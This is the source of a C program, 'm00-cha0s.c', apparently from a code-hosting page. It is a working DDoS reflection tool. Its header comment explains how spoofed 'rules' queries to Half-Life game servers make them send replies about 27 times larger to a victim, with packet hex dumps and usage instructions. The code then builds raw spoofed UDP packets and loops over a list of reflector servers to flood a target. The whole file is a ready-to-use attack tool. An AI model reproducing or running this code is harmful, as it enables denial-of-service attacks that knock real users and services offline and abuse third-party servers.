-
Notifications
You must be signed in to change notification settings - Fork 0
/
m00-cha0s.c
220 lines (207 loc) · 11.4 KB
/
m00-cha0s.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
/*
* m00-cha0s.c
*
* Remote exploit for HalfLife servers that allows you to DDoS via them.
*
* Usage: ./m00-cha0s <victim_ip> <victim_port> <file_with_HL_servers> <# of packets>
* Servers and ports in <file_with_HL_servers> must be in colon seperated <server>:<port> format.
*
* WARNING:
* 1. you need root privileges to use it (raw sockets..).
* 2. on some systems (ex. Fedora Linux) there is a problem with resolvieng hosts from HL_serv_list.
* I dunno why, but Im workin` on it.
* 3. victim_port must be >1024
*
* Vulnerability and exploit code by d4rkgr3y [d4rk@securitylab.ru] // m00.void.ru
*
* Private m00 exploit code. Keep it private or die bitch.
*/
/*
* Vulnerability info
* Actually, I've seen information about possibility of DoS via game servers on bugtraqs for a while.
* I (as well as all others) haven't paid attention to this posts, until I've discovered this problem
* by myself.
* There is a "rules" command in HL servers. Server replies to it with detailed information
* about him. Example:
*
* client ask:
* 0x0000 BA 87 20 00 05 00 00 00-05 00 00 00 08 00 45 00 ?‡ ...........E.
* 0x0010 00 26 10 FB 00 00 C8 11-91 45 51 D3 29 32 D4 7A .&.u..E.‘EQO)2Oz
* 0x0020 01 07 0C C9 69 87 00 12-E7 17 FF FF FF FF 72 75 ...Ei‡..c.yyyyru
* 0x0030 6C 65 73 00 les.
* #Size 52b
*
* server reply:
* 0x0000 00 00 05 00 00 00 BA 87-20 00 05 00 08 00 45 00 ......?‡ .....E.
* 0x0010 05 44 9F FB 00 00 33 11-92 27 D4 7A 01 07 51 D3 .DYu..3.’'Oz..QO
* 0x0020 29 32 69 87 0C C9 05 30-D0 64 FF FF FF FF 45 4D )2i‡.E.0?dyyyyEM
* 0x0030 00 73 79 73 5F 74 69 63-72 61 74 65 00 35 30 30 .sys_ticrate.500
* 0x0040 2E 30 30 30 30 30 30 00-6D 70 5F 6C 6F 67 66 69 .000000.mp_logfi
* 0x0050 6C 65 00 31 00 64 65 61-74 68 6D 61 74 63 68 00 le.1.deathmatch.
* 0x0060 31 00 63 6F 6F 70 00 30-00 70 61 75 73 61 62 6C 1.coop.0.pausabl
* 0x0070 65 00 30 00 73 76 5F 76-6F 69 63 65 65 6E 61 62 e.0.sv_voiceenab
* 0x0080 6C 65 00 31 00 6D 70 5F-63 6F 6E 73 69 73 74 65 le.1.mp_consiste
* 0x0090 6E 63 79 00 31 00 73 76-5F 63 6F 6E 74 61 63 74 ncy.1.sv_contact
* 0x00A0 00 00 73 76 5F 6D 61 78-75 70 64 61 74 65 72 61 ..sv_maxupdatera
* 0x00B0 74 65 00 31 30 30 2E 30-30 30 30 30 30 00 73 76 te.100.000000.sv
* 0x00C0 5F 70 72 6F 78 69 65 73-00 32 00 73 76 5F 70 61 _proxies.2.sv_pa
* 0x00D0 73 73 77 6F 72 64 00 30-00 73 76 5F 61 69 6D 00 ssword.0.sv_aim.
* 0x00E0 30 00 73 76 5F 67 72 61-76 69 74 79 00 38 30 30 0.sv_gravity.800
* 0x00F0 00 73 76 5F 66 72 69 63-74 69 6F 6E 00 34 2E 30 .sv_friction.4.0
* 0x0100 30 30 30 30 30 00 65 64-67 65 66 72 69 63 74 69 00000.edgefricti
* 0x0110 6F 6E 00 32 00 73 76 5F-73 74 6F 70 73 70 65 65 on.2.sv_stopspee
* 0x0120 64 00 37 35 2E 30 30 30-30 30 30 00 73 76 5F 6D d.75.000000.sv_m
* 0x0130 61 78 73 70 65 65 64 00-33 32 30 00 6D 70 5F 66 axspeed.320.mp_f
* 0x0140 6F 6F 74 73 74 65 70 73-00 31 00 73 76 5F 61 63 ootsteps.1.sv_ac
* 0x0150 63 65 6C 65 72 61 74 65-00 35 2E 30 30 30 30 30 celerate.5.00000
* 0x0160 30 00 73 76 5F 73 74 65-70 73 69 7A 65 00 31 38 0.sv_stepsize.18
* 0x0170 00 73 76 5F 63 6C 69 70-6D 6F 64 65 00 30 00 73 .sv_clipmode.0.s
* 0x0180 76 5F 62 6F 75 6E 63 65-00 31 00 73 76 5F 61 69 v_bounce.1.sv_ai
* 0x0190 72 6D 6F 76 65 00 31 00-73 76 5F 61 69 72 61 63 rmove.1.sv_airac
* 0x01A0 63 65 6C 65 72 61 74 65-00 31 2E 35 00 73 76 5F celerate.1.5.sv_
* 0x01B0 77 61 74 65 72 61 63 63-65 6C 65 72 61 74 65 00 wateraccelerate.
* 0x01C0 31 30 00 73 76 5F 77 61-74 65 72 66 72 69 63 74 10.sv_waterfrict
* 0x01D0 69 6F 6E 00 31 00 73 76-5F 63 6C 69 65 6E 74 74 ion.1.sv_clientt
* 0x01E0 72 61 63 65 00 31 00 73-76 5F 63 68 65 61 74 73 race.1.sv_cheats
* 0x01F0 00 30 00 73 76 5F 61 6C-6C 6F 77 75 70 6C 6F 61 .0.sv_allowuploa
* 0x0200 64 00 30 00 73 76 5F 6D-69 6E 72 61 74 65 00 30 d.0.sv_minrate.0
* 0x0210 00 73 76 5F 6D 61 78 72-61 74 65 00 34 30 30 30 .sv_maxrate.4000
* 0x0220 00 72 65 73 65 72 76 65-5F 73 6C 6F 74 73 00 31 .reserve_slots.1
* 0x0230 00 73 65 72 76 65 72 5F-66 70 73 00 38 37 2E 30 .server_fps.87.0
* 0x0240 30 30 30 30 30 00 62 6F-6F 73 74 65 72 5F 76 65 00000.booster_ve
* 0x0250 72 73 69 6F 6E 00 31 2E-33 33 00 73 74 61 74 73 rsion.1.33.stats
* 0x0260 6D 65 5F 76 65 72 73 69-6F 6E 00 32 2E 36 2E 34 me_version.2.6.4
* 0x0270 00 61 64 6D 69 6E 5F 68-69 67 68 6C 61 6E 64 65 .admin_highlande
* 0x0280 72 00 30 00 61 64 6D 69-6E 5F 69 67 6E 6F 72 65 r.0.admin_ignore
* 0x0290 5F 69 6D 6D 75 6E 69 74-79 00 30 00 61 64 6D 69 _immunity.0.admi
* 0x02A0 6E 5F 71 75 69 65 74 00-30 00 61 64 6D 69 6E 5F n_quiet.0.admin_
* 0x02B0 6D 6F 64 5F 76 65 72 73-69 6F 6E 00 32 35 30 32 mod_version.2502
* 0x02C0 36 61 20 28 4D 4D 29 00-61 6C 6C 6F 77 5F 63 6C 6a (MM).allow_cl
* 0x02D0 69 65 6E 74 5F 65 78 65-63 00 31 00 61 6D 76 5F ient_exec.1.amv_
* 0x02E0 70 72 69 76 61 74 65 5F-73 65 72 76 65 72 00 30 private_server.0
* 0x02F0 00 64 65 66 61 75 6C 74-5F 61 63 63 65 73 73 00 .default_access.
* 0x0300 30 00 70 75 62 6C 69 63-5F 73 6C 6F 74 73 5F 66 0.public_slots_f
* 0x0310 72 65 65 00 38 2E 30 30-30 30 30 30 00 72 65 73 ree.8.000000.res
* 0x0320 65 72 76 65 5F 74 79 70-65 00 30 00 6D 70 5F 74 erve_type.0.mp_t
* 0x0330 69 6D 65 6C 69 6D 69 74-00 33 30 00 6D 70 5F 66 imelimit.30.mp_f
* 0x0340 72 69 65 6E 64 6C 79 66-69 72 65 00 31 00 6D 70 riendlyfire.1.mp
* 0x0350 5F 66 6C 61 73 68 6C 69-67 68 74 00 31 00 64 65 _flashlight.1.de
* 0x0360 63 61 6C 66 72 65 71 75-65 6E 63 79 00 33 30 00 calfrequency.30.
* 0x0370 6D 70 5F 61 6C 6C 6F 77-6D 6F 6E 73 74 65 72 73 mp_allowmonsters
* 0x0380 00 30 00 6D 70 5F 72 6F-75 6E 64 74 69 6D 65 00 .0.mp_roundtime.
* 0x0390 34 00 6D 70 5F 62 75 79-74 69 6D 65 00 31 00 6D 4.mp_buytime.1.m
* 0x03A0 70 5F 66 72 65 65 7A 65-74 69 6D 65 00 35 00 6D p_freezetime.5.m
* 0x03B0 70 5F 63 34 74 69 6D 65-72 00 34 35 00 6D 70 5F p_c4timer.45.mp_
* 0x03C0 67 68 6F 73 74 66 72 65-71 75 65 6E 63 79 00 30 ghostfrequency.0
* 0x03D0 2E 31 00 6D 70 5F 61 75-74 6F 6B 69 63 6B 00 30 .1.mp_autokick.0
* 0x03E0 00 73 76 5F 72 65 73 74-61 72 74 72 6F 75 6E 64 .sv_restartround
* 0x03F0 00 30 00 73 76 5F 72 65-73 74 61 72 74 00 30 00 .0.sv_restart.0.
* 0x0400 6D 70 5F 6C 69 6D 69 74-74 65 61 6D 73 00 32 00 mp_limitteams.2.
* 0x0410 6D 70 5F 61 75 74 6F 74-65 61 6D 62 61 6C 61 6E mp_autoteambalan
* 0x0420 63 65 00 31 00 6D 70 5F-74 6B 70 75 6E 69 73 68 ce.1.mp_tkpunish
* 0x0430 00 30 00 6D 70 5F 68 6F-73 74 61 67 65 70 65 6E .0.mp_hostagepen
* 0x0440 61 6C 74 79 00 30 00 6D-70 5F 6D 69 72 72 6F 72 alty.0.mp_mirror
* 0x0450 64 61 6D 61 67 65 00 30-00 6D 70 5F 6C 6F 67 6D damage.0.mp_logm
* 0x0460 65 73 73 61 67 65 73 00-31 00 6D 70 5F 66 6F 72 essages.1.mp_for
* 0x0470 63 65 63 61 6D 65 72 61-00 30 00 6D 70 5F 66 6F cecamera.0.mp_fo
* 0x0480 72 63 65 63 68 61 73 65-63 61 6D 00 30 00 6D 70 rcechasecam.0.mp
* 0x0490 5F 6D 61 70 76 6F 74 65-72 61 74 69 6F 00 30 2E _mapvoteratio.0.
* 0x04A0 36 00 6D 70 5F 6D 61 78-72 6F 75 6E 64 73 00 30 6.mp_maxrounds.0
* 0x04B0 00 6D 70 5F 77 69 6E 6C-69 6D 69 74 00 30 00 6D .mp_winlimit.0.m
* 0x04C0 70 5F 66 61 64 65 74 6F-62 6C 61 63 6B 00 30 00 p_fadetoblack.0.
* 0x04D0 6D 70 5F 6C 6F 67 64 65-74 61 69 6C 00 30 00 6D mp_logdetail.0.m
* 0x04E0 70 5F 73 74 61 72 74 6D-6F 6E 65 79 00 38 30 30 p_startmoney.800
* 0x04F0 00 6D 70 5F 70 6C 61 79-65 72 69 64 00 30 00 61 .mp_playerid.0.a
* 0x0500 6C 6C 6F 77 5F 73 70 65-63 74 61 74 6F 72 73 00 llow_spectators.
* 0x0510 31 00 6D 70 5F 63 68 61-74 74 69 6D 65 00 31 30 1.mp_chattime.10
* 0x0520 00 6D 70 5F 6B 69 63 6B-70 65 72 63 65 6E 74 00 .mp_kickpercent.
* 0x0530 30 2E 36 36 00 6D 70 5F-66 72 61 67 73 6C 65 66 0.66.mp_fragslef
* 0x0540 74 00 30 00 6D 70 5F 74-69 6D 65 6C 65 66 74 00 t.0.mp_timeleft.
* 0x0550 30 00 0.
* #Size 1362b!!!
*
* Sorry for a garbage, but you need to understand, how huge the server's answer is (relatively).
* We send him ~52b, he replies with ~1.4kb.
* Factor is ~27!! It's amazing! Taking into account that udp protocol and spoof are still actual, every
* HL server in internet not depending on version and setting can be a deadly weapon against dial-up user
* (and not only dial-up)
* If you haven't understood, the idea is:
* We send udp-datagram with spoofed src-address (out target IP) which contains:
* "\xFF\xFF\xFF\xFF\x72\x75\x6C\x65\x73\x00" (rules\0)
* Server replies to src-address with datagramm, which is 27 times larger than ours.
* Just imagine, how much do we send and how much our target receives.
*
* So this exploit code sends a lot of spoofed UDP datagramms to HL servers which will send
* replies to our victim.
*
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in_systm.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <stdio.h>
main(int argc,char **argv) {
char buf[100],buf1[100],buf2[10];
int port;
int fd;
int sent=0;
int i;
long count;
struct sockaddr sa;
struct sockaddr_in *p;
struct hostent *he;
FILE *hl_lst;
u_char gram[]= {
0x45, 0x00, 0x00, 0x26,
0x12, 0x34, 0x00, 0x00,
0xFF, 0x11, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x12, 0x00, 0x00,
0xFF, 0xFF, 0xFF, 0xFF,
0x72, 0x75, 0x6C, 0x65,
0x73, 0x00
};
printf("\nm00-cha0s.c ~ read the header bitch ~ m00.void.ru\nInternal m00 release. Do not distribute.\n\n");
if(argc!=5) { printf("Usage: %s <IP> <port> <file_with_HL_server> <# of packets>\n\n",argv[0]); exit(1); }
count=atoi(argv[4]);
if((he=gethostbyname(argv[1]))==NULL) { perror("[-] gethostbyname() #1"); exit(0); }
bcopy(*(he->h_addr_list),(gram+12),4);
printf("* Attacking host %s\n* Number of packets %i\n* GO GO GO...\n",argv[1],count);
printf("* Packets sent: %i\r",sent);
for (sent=0;sent<count;sent++) {
if((hl_lst = fopen(argv[3], "r")) == 0) { perror("[-] fopen()"); exit(0); }
while(fgets(buf,100,hl_lst)) {
buf[strlen(buf)-1]='\x00';
memcpy(buf1,strchr(buf,':')+1,5);
buf[strlen(buf)-strlen(buf1)]='\x00';
port=atoi(buf1);
if(buf[strlen(buf)-1]==':') buf[strlen(buf)-1]='\x00';
//printf("%s %d\n",buf,port);
//if((gram[16]=inet_addr(buf))==-1) {
if((he=gethostbyname(buf))==NULL) { perror("[-] gethostbyname() #2"); continue; }
bcopy(*(he->h_addr_list),(gram+16),4);
//}
*(u_short*)(gram+20)=htons((u_short)atoi(argv[2]));
*(u_short*)(gram+22)=htons((u_short)port);
p=(struct sockaddr_in*)&sa;
p->sin_family=AF_INET;
bcopy(*(he->h_addr_list),&(p->sin_addr),sizeof(struct in_addr));
if((fd=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))== -1) { perror("[-] socket()"); exit(0); }
if((sendto(fd,&gram,sizeof(gram),0,(struct sockaddr*)p,sizeof(struct sockaddr)))==-1) { perror("[-] sendto()"); break; }
sent++;
close(fd);
printf("* Packets sent: %i\r",sent);
fflush(stdout);
if(sent==count) { printf("\n"); exit(0); }
}
fclose(hl_lst);
}
}